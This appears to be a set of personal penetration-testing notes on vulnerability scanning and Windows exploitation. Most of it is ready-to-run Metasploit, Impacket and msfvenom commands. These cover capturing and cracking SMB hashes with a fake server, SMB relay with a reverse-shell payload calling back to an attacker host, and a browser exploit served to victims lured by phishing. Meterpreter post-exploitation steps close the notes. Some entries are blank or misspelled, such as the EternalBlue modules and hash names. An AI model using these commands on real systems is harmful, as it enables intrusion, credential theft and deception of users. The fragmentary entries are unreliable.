Exploitation/Vulnerability Assessment

Vulnerability Assessment

Generating a list of vulnerabilities present on all in-scope systems discovered.

Vulnerability Scanners
Only used when stealth is not a concern.

Utilize a database of known vulnerabilities to probe target daemons on TCP/UDP ports, configuration files, software suites, network devices and windows registry entries.

Vulnerability Scanners are very prone to false positives....it's good to check manually as well.


  1. OpenVAS
  2. Nexpose
  3. Nessus
  4. Nuclei

Server hosted on port 8834

Low Hanging Fruits


Grabs screenshots of web applications, networking devices, and any devices using HTTP/HTTPS. It can also determine if default credentials are used.


python3 EyeWitness.py --headless --prepend-https -f <IPs/URLFile>

--active-scan will attempt to login with default creds. Very loud. Will set off IDS.

Authentication Brute Forcing



  1. Client sends an authentication request
  2. Sever sends an 8-byte random challenge
  3. Client encrypts challenge using the password hash and sends it back to the server

use auxiliary/server/capture/smb
set JOHPWFILE hashpwd

After setting up metasploit, we need to trick the users into starting a connection to our fake server.

If the LMHASH and NMHASH are the same, then only NT is being used. If they are different, LM is in use.

Crack the hashes w/John
john --format=ntlm <file>


Only way to accks it is by brute-forcing the HMAC key.

Hash is bound to a particular server/username so they aren't reusable.

Hash can still be utilized in other attacks.

SMB Relay Attack

Reusing authentication attempts to gain access to a network system.


smb_relay in metasploit
Only works if the authenticating user has administrative privileges on a target

use exploit/windows/smb/smb_relay
set SMBHOST <SMBServer>
set LHOST <AttackerIP>
set LPORT <Port>

smbrelayx.py (part of Impacket)

Impacket: https://www.secureauth.com/labs/open-source-tools/impacket/


  1. Create meterpreter payload for Impacket to execute on target

    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<PORT> -f <exe> -o <file.exe>
  2. Start listener within msfconsole

    1. use exploit/multi/handler
    2. set LHOST <AttackerIP>
    3. set LPORT <Port>
    4. run
  3. Start smbrelayx.py with the payload

    1. python3 smbrelayx.py -h <TargetIP> -e <MsfvenomPayload>
  4. If the attack succeeds, you will gain a meterpreter session.

EternalBlue (MS17_010)


Affects Microsoft SMBv1 implementation

Module to check for vulnerability:

Module to run exploit:

Client-Side Exploitation with Metasploit

This module starts a webserver and hosts a webpage containing the exploit.

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST <AttackerIP>
set SRVPORT <Port>
set PAYLOAD <firefox/shell_reverse_tcp>

We now need to lure the victim to the webpage via phishing or social engineering.


search type:exploit platform:windows
search cve:#

info <exploit>

File Path to Modules in Kali:

On my computer:

List Targets a payload effects:
show targets

From a meterpreter session, execute a hidden command prompt to interact with:
execute -f cmd.exe -i H

Meterpreter Post Exploitation Scripts:
run post/../../

run post/windows/gather/enum_services OR ps
run post/windows/gather/enum_applications
migrate <ProcessID>